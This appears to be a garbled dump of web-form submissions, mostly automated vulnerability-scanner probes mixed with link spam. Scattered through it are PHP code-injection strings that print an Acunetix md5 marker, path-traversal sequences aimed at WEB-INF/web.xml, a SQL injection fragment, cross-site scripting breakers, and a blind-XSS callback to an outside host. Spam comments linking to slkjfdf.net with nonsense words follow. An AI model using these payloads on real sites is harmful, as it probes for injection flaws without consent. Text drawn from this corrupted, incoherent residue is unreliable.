.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\


1


1


";print(md5(acunetix_wvs_security_test));$a="


WEB-INF/web.xml


1


${@print(md5(acunetix_wvs_security_test))}


1


1


WEB-INF\web.xml


1


${@print(md5(acunetix_wvs_security_test))}\


comment.php


1


http://hit8PBbMRGlNV.bxss.me/


1'"


comment.php


1


1


\


comment.php/.


)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


1


1����


1


1


1


1


@@KeAUa


1


1


1


JyI=


1


1



11


1


�'�"


/www.vulnweb.com


1


1


�''�""


1


'"


1


1


1


(select convert(int,CHAR(65)))


1


<!--


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1_9708


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1


1













http://slkjfdf.net/ - Ihuseja <a href="http://slkjfdf.net/">Ecusosimv</a> bgp.kzhb.samsclass.info.mgm.kb http://slkjfdf.net/


http://slkjfdf.net/ - Ikifokcu <a href="http://slkjfdf.net/">Etokeg</a> dqt.tcyz.samsclass.info.xun.tn http://slkjfdf.net/


http://slkjfdf.net/ - Oicutu <a href="http://slkjfdf.net/">Erzufoqej</a> enj.bqmp.samsclass.info.far.au http://slkjfdf.net/


http://slkjfdf.net/ - Ewesuvosi <a href="http://slkjfdf.net/">Obuwiwees</a> cam.edfj.samsclass.info.doy.uj http://slkjfdf.net/


http://slkjfdf.net/ - Ixipaz <a href="http://slkjfdf.net/">Ekelez</a> akw.izwb.samsclass.info.dxb.ty http://slkjfdf.net/


http://slkjfdf.net/ - Ejeuhiwa <a href="http://slkjfdf.net/">Iqiceldic</a> fod.jcnt.samsclass.info.srl.od http://slkjfdf.net/







1zqjlr'"(){}<x>:/1zqjlr;9